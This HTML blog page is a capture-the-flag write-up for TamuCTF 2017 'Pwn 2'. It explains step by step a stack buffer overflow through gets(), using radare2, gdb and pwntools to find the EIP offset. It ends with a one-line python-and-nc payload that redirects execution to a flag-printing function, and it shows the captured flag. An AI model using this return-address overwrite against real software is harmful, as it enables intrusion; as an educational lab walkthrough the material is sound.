<!DOCTYPE html>
<html>
<head>
    <meta name="generator" content="Hugo 0.27-DEV" />

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="My thoughts and rambles">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    
    <link rel="icon" type="image/png" href="/images/favicon.ico">

    
    <meta name="mobile-web-app-capable" content="yes">
    <link rel="icon" sizes="192x192" href="/images/touch/chrome-touch-icon-192x192.png">

    
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="apple-mobile-web-app-title" content="Material Design Lite">
    <link rel="apple-touch-icon-precomposed" href="apple-touch-icon-precomposed.png">

    
    <meta name="msapplication-TileImage" content="images/touch/ms-touch-icon-144x144-precomposed.png">
    <meta name="msapplication-TileColor" content="#3372DF">

    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:regular,bold,italic,thin,light,bolditalic,black,medium&amp;lang=en"/>
    <link rel="stylesheet" href="/css/ionicons.min.css"/>
    <link rel="stylesheet" href="https://storage.googleapis.com/code.getmdl.io/1.1.3/material.grey-orange.min.css"/>
    <link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons">
    <link rel="stylesheet" href="/css/hmdl-style.css"/>
	<link rel="stylesheet" href="/css/pygment.css">


<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-103806632-1', 'auto');
ga('send', 'pageview');
</script>
<script async src='//www.google-analytics.com/analytics.js'></script>


    <title>TamuCTF 2017 - Pwn 2</title>
</head>

<body style="background-image: url('/images/background.jpg');">
    <div id="MainCnt" class="hmdl-body mdl-layout mdl-js-layout has-drawer is-upgraded">        
        <header class="mdl-layout__header mdl-layout__header--transparent mdl-layout__header--scroll">
            <div class="mdl-layout__header-row">
                <div class="mdl-layout-spacer"></div>
                <nav class="mdl-navigation">
                <a class="mdl-navigation__link" href="/">Home</a>
                <a class="mdl-navigation__link" href="/post/">Articles</a>
                <a class="mdl-navigation__link" href="/project/">Projects</a>
                <a class="mdl-navigation__link" href="/about/">About</a>
                </nav>
            </div>
        </header>
        <div class="mdl-layout__drawer">
            <nav class="mdl-navigation">
            <a class="mdl-navigation__link" href="/">Home</a>
            <a class="mdl-navigation__link" href="/post/">Articles</a>
            <a class="mdl-navigation__link" href="/project/">Projects</a>
            <a class="mdl-navigation__link" href="/about/">About</a>
            </nav>
        </div>

        <main class="mdl-layout__content">

		

            <div class="hmdl-page mdl-grid">
                <div class="mdl-card mdl-shadow--4dp mdl-cell mdl-cell--12-col">
                    <div class="mdl-card__media mdl-color-text--grey-50" style=" background-color:white;">
                        <h3 style="color:orange;">TamuCTF 2017 - Pwn 2</h3>
                    </div>
                    <div class="hmdl-page-meta mdl-color-text--grey-700 mdl-card__supporting-text">
                        <div class="minilogo" style="background-image: url('/images/avatar-64x64.png');"></div>

                        <div>
							<strong>
                            		<strong>Tzaoh</strong>
							</strong>
                            <span>May 28, 2017</span>
                        </div>
                        <div class="section-spacer"></div>
                    </div>
                    <div class="hmdl-page-content mdl-color-text--grey-700 mdl-card__supporting-text">
                        

<p><img src="/assets/TamuCTF2017/pwn2/1-pwn2_description.png" alt="Pwn2 challenge description" /></p>

<p>We are given a source code file and a binary which is being run remotely.
Let&rsquo;s a analyze it with radare2:</p>
<div class="highlight"><pre><code class="language-r2" data-lang="r2"><span></span>$ wget https<span class="o">://</span>ctf<span class="o">.</span>tamu<span class="o">.</span>edu<span class="o">/</span>files<span class="o">/</span>dacdf<span class="mh">9d7951deede662f1b89e4ec2a90</span><span class="o">/</span>pwn<span class="mh">2</span>
$ r<span class="mh">2</span> pwn<span class="mh">2</span>
[<span class="mh">0x08048450</span>]<span class="o">&gt;</span> <span class="nf">aaa</span>		# Analyze
[<span class="mh">0x08048450</span>]<span class="o">&gt;</span> <span class="nf">afl</span>		# List functions found
.
.
<span class="s">0x0804854b</span>  <span class="mh">  4 103        </span>  sym.print_flag
<span class="s">0x080485b2</span>  <span class="mh">  1 84         </span>  sym.echo
<span class="s">0x08048606</span>  <span class="mh">  1 36         </span>  sym.main
.
.
</code></pre></div>

<p>We can see similar functions to the previous pwning challenge, but there a complication here: if we look closely&hellip;</p>
<div class="highlight"><pre><code class="language-r2" data-lang="r2"><span></span>[<span class="mh">0x080485c0</span>]<span class="o">&gt;</span> <span class="nf">s</span> sym.print_flag 
[<span class="mh">0x0804854b</span>]<span class="o">&gt;</span> <span class="nf">axt</span>
[<span class="mh">0x0804854b</span>]<span class="o">&gt;</span>
</code></pre></div>

<p>We realize that <strong>print_flag</strong> function, which is responsible for printing the flag stored in <strong>flag.txt</strong>, is never called!<br />
Instead a new function named <strong>echo</strong> is called from <strong>main</strong> function.</p>

<p><img src="/assets/TamuCTF2017/pwn2/2-pwn2_call_echo_in_main.png" alt="Pwn2 call in main function" /></p>

<p>Lets see what it does:</p>
<div class="highlight"><pre><code class="language-r2" data-lang="r2"><span></span>[<span class="mh">0x0804854b</span>]<span class="o">&gt;</span> <span class="nf">pdf</span> @ sym.echo
</code></pre></div>

<p><img src="/assets/TamuCTF2017/pwn2/3-pwn2_echo_function.png" alt="Pwn2 echo function content" /></p>

<p>Ok, so aparently it just prints back whatever you input before. But hey! To read your input it uses <code>gets</code> insecure function again!  That means we can write beyond the allocated memory for our input.
&gt; &ldquo;All right, but this case is not like the previous one! (<a href="../pwn1/pwn1.md">pwn1 challenge</a>).<br />
&gt; We do not want to change the value of a variable, but to call an existent function!&rdquo;
&gt; Is it possible?</p>

<p>Hell yeah! but to know how, we first need to understand how the stack is affected when calling a function (echo in this case).<br />
When a function is going to be called, some data is going to be pushed into the stack. Among other things one of the stuff is stored is the EIP register.</p>

<blockquote>
<p>&ldquo;Why this register? Why is it special?&rdquo;</p>
</blockquote>

<p>The purpose of EIP register (or instruction pointer) is to indicate the CPU which instruction has to be executed after the current one. When the <strong>echo</strong> function will finish the CPU will need to continue the execution right after the call.<br />
Like this:</p>

<p><img src="/assets/TamuCTF2017/pwn2/4-pwn2_normal_flow.png" alt="Pwn2 Normal execution flow" /></p>

<p>And the stack will look like:</p>

<p><img src="/assets/TamuCTF2017/pwn2/5-pwn2_stack_view.png" alt="Pwn2 Stack view on echo call" /></p>

<p>Nice ✌️!, looking at the stack we realize we could just write a bunch of bytes until we reach the <strong>Saved EIP</strong> value!</p>

<blockquote>
<p>Okay but &hellip; how many bytes do we have to write?</p>
</blockquote>

<p>Well, in this case we can calculate like <code>0x88h + 4d (ESP length) = 140d</code>, but I&rsquo;ll calculate another way too.<br />
Lets use gdb (GNU Debugger).</p>
<div class="highlight"><pre><code class="language-bash" data-lang="bash"><span></span>$ python -c <span class="s1">&#39;print(&quot;A&quot;*500)&#39;</span> &gt; input.txt    <span class="c1"># We generate a long string and save it in a text file.</span>
$ gdb pwn2                                  <span class="c1"># We open the binary with gdb.</span>
<span class="o">(</span>gdb<span class="o">)</span> run &lt; input.txt                       <span class="c1"># Run the binary with the content of input.txt as input.</span>
</code></pre></div>

<p><img src="/assets/TamuCTF2017/pwn2/6-pwn2_gdb.png" alt="Pwn2 GDB executing pwn2" /></p>

<p>We ran the binary with gdb and passed 500 &ldquo;A&rdquo;s as input.
That <code>0x41414141</code> means that we have overwritten EIP register with value &ldquo;AAAA&rdquo; and the process crashed when it tried to execute the instrucction of that address (obviously there is nothing there).</p>

<p>So now we could just create a custom string like &ldquo;ABCDEF&hellip;.&rdquo; to figure out which part of the string is being used to overwrite the EIP &hellip; OR we can use a script which generates it for us 😁.</p>

<p>Now is when it comes the <strong>pwntools</strong> for python (to install just do
<code>bash $ pip install pwntools</code></p>

<p>) and more specifically its
<strong>cyclic</strong> utility. <strong>Cyclic</strong> is able to generate a sequence of unique substrings of any length (4 by default).</p>

<p>Lets try it!</p>
<div class="highlight"><pre><code class="language-bash" data-lang="bash"><span></span>$ pwn cyclic <span class="m">500</span> &gt; input.txt  <span class="c1"># Generate a string of 500 chars with unique substrings of 4 characters.</span>
$ gdb pwn2
<span class="o">(</span>gdb<span class="o">)</span> run &lt; input.txt
</code></pre></div>

<p><img src="/assets/TamuCTF2017/pwn2/7-pwn2_gdb_cyclic.png" alt="Pwn2 GDB Executing pwn2" /></p>

<p>To check that value we do:</p>
<div class="highlight"><pre><code class="language-bash" data-lang="bash"><span></span>$ pwn cyclic -l 0x6261616b
<span class="m">140</span>
</code></pre></div>

<p>And finally, after 140 Characters we write a new address to continue the execution. Which address? the address of the <strong>print_flag</strong> function, of course! The new execution flow will look like this:</p>

<p><img src="/assets/TamuCTF2017/pwn2/8-pwn2_modified_flow.png" alt="Pwn2 Modified execution flow" /></p>

<p>Lets get our flag:</p>
<div class="highlight"><pre><code class="language-bash" data-lang="bash"><span></span>$ python -c <span class="s1">&#39;print(&quot;A&quot;*140 + &quot;\x4b\x85\x04\x08&quot;)&#39;</span> <span class="p">|</span> nc pwn.ctf.tamu.edu <span class="m">4321</span> 
Enter a word to be echoed:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK�
This <span class="k">function</span> has been deprecated
gigem<span class="o">{</span>D34D_FUNC_R1S1NG<span class="o">}</span>
</code></pre></div>

<p>Answer: gigem{D34D_FUNC_R1S1NG}</p>

<h3 id="complete-video">Complete video</h3>

<p><a href="https://asciinema.org/a/e8oyx42bm4nbs5stm33o4x24s?autoplay=1"><img src="https://asciinema.org/a/e8oyx42bm4nbs5stm33o4x24s.png" width="400"/></a></p>

<h3 id="tools-used">Tools used:</h3>

<ul>
<li><a href="https://github.com/radare/radare2">radare2</a> - To analyze the binary.</li>
<li><a href="https://www.gnu.org/software/gdb/">gdb</a> - For binary debugging.</li>
<li><a href="https://github.com/Gallopsled/pwntools">pwntools</a> and <a href="http://docs.pwntools.com/en/stable/util/cyclic.html#pwnlib.util.cyclic.cyclic">cyclic</a> - To generate unique substrings.</li>
<li><a href="https://www.draw.io/">draw.io</a> - To draw some graphics.</li>
<li><a href="https://asciinema.org">asciinema</a> - To record the session.</li>
</ul>

                    </div>
                    <div class="hmdl-page-comments mdl-color-text--primary-contrast mdl-card__supporting-text comments"> 
                        <strong>
                            	<strong>Tzaoh</strong>
						</strong>
                        <p></p>
                    </div>  
                </div>                
                <nav class="mdl-color-text--grey-50 mdl-cell mdl-cell--12-col">
                    <a href="/post/tamuctf2017/pwn1/">
                        <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                        <i class="icon ion-android-arrow-back"></i>
                        </button>
                        Older
                    </a>
                    <div class="section-spacer"></div>
                    <a href="/post/tamuctf2017/pwn3/">
                        Newer
                        <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                            <i class="icon ion-android-arrow-forward"></i>
                        </button>
                    </a>
                </nav>
 
            </div>        
        </main>
        <footer class="mdl-mini-footer">
            <div class="mdl-mini-footer--left-section">                
                <a class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-mini-footer--social-btn social-btn" href="mailto:Firstname@example.com?subject=Hi">
                    <i class="material-icons_lg icon ion-email"></i>
                    <span class="visuallyhidden">Email</span>
                </a>
                <a class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-mini-footer--social-btn social-btn" href="https://github.com/BlackHoods">
                    <i class="material-icons_lg icon ion-social-github"></i>
                    <span class="visuallyhidden">Github</span>
                </a>
                <a class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-mini-footer--social-btn social-btn" href="https://twitter.com/firstname_lastname">
                    <i class="material-icons_lg icon ion-social-twitter "></i>
                    <span class="visuallyhidden">Twitter</span>
                </a>


            </div>
            <div class="mdl-mini-footer--right-section">
                <span>© 2017 </span>
            </div>
        </footer>
        <div class="mdl-layout__obfuscator"></div>
    </div>
    <script src="https://code.getmdl.io/1.1.3/material.min.js"></script>


</body>
</html>

